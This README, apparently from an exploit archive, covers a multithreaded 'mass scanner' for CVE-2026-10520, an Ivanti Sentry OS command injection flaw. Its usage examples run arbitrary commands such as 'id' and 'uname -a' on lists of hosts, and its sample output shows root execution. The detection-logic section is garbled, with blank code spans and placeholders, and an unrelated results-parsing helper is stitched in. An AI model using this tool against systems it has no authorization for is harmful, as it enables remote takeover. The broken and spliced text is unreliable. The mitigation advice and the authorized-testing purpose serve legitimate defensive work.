## https://sploitus.com/exploit?id=D08D4EF5-0307-5336-8253-F56FE19CCC6B
# CVE-2026-10520: Ivanti Sentry Mass Scanner

Detection scanner for [CVE-2026-10520](https://nvd.nist.gov/vuln/detail/CVE-2026-10520), an OS command injection vulnerability in Ivanti Sentry.

## Vulnerability Overview

| Field | Value |
|---|---|
| **CVE** | CVE-2026-10520 |
| **CWE** | CWE-78 (OS Command Injection) |
| **Severity** | Critical (CVSS 10.0) |
| **CVSS Vector** | `CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H` |
| **Affected Versions** | Ivanti Sentry releases prior to the fixed builds listed under Mitigation |

**Note:** The detection check may return false positives.

## Scanner

This tool performs non-destructive detection scanning across multiple hosts to identify potentially vulnerable Ivanti Sentry instances.

### Requirements

- Python 3.8+

```bash
pip install -r requirements.txt
```

### Usage

```
python exploit_poc.py --targets hosts.txt --cmd id --output results
```

#### Targets File Format

One target URL per line. Lines starting with `#` are treated as comments and blank lines are skipped. If no scheme is provided, `https://` is assumed.

```
# Example targets.txt
192.168.1.10:8443
https://sentry.example.com
192.168.1.11:8443
```

#### Options

| Flag | Description | Default |
|---|---|---|
| `--targets` | Path to file with one target URL per line | *(required)* |
| `--cmd` | Detection command to run | `id` |
| `--threads` | Max concurrent scan threads | `10` |
| `--rate-limit` | Delay in seconds between requests to the same host | `0.0` |
| `--timeout` | Per-host request timeout (seconds) | `10` |
| `-p, --proxy` | Proxy address:port (e.g., `127.0.0.1:8080`) | *(none)* |
| `--output` | Output file base name (CSV + JSON) | *(none)* |

#### Examples

```bash
# Basic scan
python exploit_poc.py --targets targets.txt

# Custom command, higher concurrency
python exploit_poc.py --targets targets.txt --cmd 'uname -a' --threads 20

# With proxy and output files
python exploit_poc.py --targets targets.txt --proxy 127.0.0.1:8080 --output results

# Rate-limited scan
python exploit_poc.py --targets targets.txt --rate-limit 0.5
```

### Output

#### Console

Per-host results with color-coded status:

```
  [   VULNERABLE] https://192.168.1.10:8443  HTTP 200  Output: uid=0(root) gid=0(root) ...
  [NOT VULNERABLE] https://192.168.1.11:8443  HTTP 404
  [         ERROR] https://192.168.1.12:8443  HTTP None  Error: Connection timed out
```

Summary at the end:

```
============================================================
  SCAN SUMMARY
============================================================
Total scanned   : 3
Vulnerable      : 1
Not vulnerable  : 1
Errors          : 1
============================================================
```

#### File Output

`--output results` produces two files:

- `results.csv`: structured CSV with columns `host`, `status`, `http_code`, `command_output_snippet`, `error`
- `results.json` โ€” structured JSON array of the same objects
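As an added example (not part of the scanner itself), the following Python helpers apply the targets-file rules documented above and turn a `results.csv` into the same summary counts the console prints, plus a patch list and a re-check list for the Mitigation step. The sample targets file and CSV rows are constructed here, and the `status` values `VULNERABLE`, `NOT VULNERABLE` and `ERROR` are assumed to match the console labels.

```python
import csv
import io

def parse_targets(text):
    """Documented rules: '#' lines are comments, blank lines are skipped,
    and a line with no scheme is assumed to be https://."""
    targets = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if "://" not in line:
            line = "https://" + line
        targets.append(line)
    return targets

def summarize(csv_text):
    """Count statuses like the console summary and split hosts into those
    that need the vendor fix and those whose scan errored and need a re-run.
    Status strings are assumed to match the console labels (constructed)."""
    rows = list(csv.DictReader(io.StringIO(csv_text)))
    counts = {"total": len(rows), "vulnerable": 0, "not_vulnerable": 0, "errors": 0}
    key_for = {"VULNERABLE": "vulnerable", "NOT VULNERABLE": "not_vulnerable"}
    needs_patch, recheck = [], []
    for row in rows:
        status = row["status"].strip().upper()
        # Anything that is not a definite verdict is treated as an error
        counts[key_for.get(status, "errors")] += 1
        if status == "VULNERABLE":
            needs_patch.append(row["host"])
        elif status not in key_for:
            recheck.append(row["host"])
    return counts, needs_patch, recheck

# Constructed sample targets file in the documented format
SAMPLE_TARGETS = """\
# Example targets.txt (constructed)
192.168.1.10:8443

https://sentry.example.com
192.168.1.11:8443
"""

# Constructed sample results.csv using the documented column names
SAMPLE_CSV = """\
host,status,http_code,command_output_snippet,error
https://192.168.1.10:8443,VULNERABLE,200,uid=0(root) gid=0(root),
https://192.168.1.11:8443,NOT VULNERABLE,404,,
https://192.168.1.12:8443,ERROR,,,Connection timed out
"""
```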

### Detection Logic

A host is marked **VULNERABLE** when the response satisfies both conditions:

1. Response body contains `Message handled successfully`
2. JSON `data` field contains `...`

The command output text inside `` is extracted and included in results.

## Example
![example](example/example.png)

## Mitigation

- Upgrade to Ivanti Sentry R10.5.2, R10.6.2, R10.7.1, or a later release
- Apply vendor-provided patches immediately
- Restrict network access to Ivanti Sentry management interfaces

## References

- [watchTowr Labs blog: More evidence that words don't mean what we thought they meant — Ivanti Sentry pre-auth OS command injection (CVE-2026-10520)](https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520)
- [watchTowr Labs: watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523](https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523)

## Disclaimer

This tool is provided for authorized security testing only. Operators must confirm they have written permission from the organization owning the target systems before scanning. Unauthorized scanning may violate applicable laws.

## License

This project is provided as-is for internal security assessment use.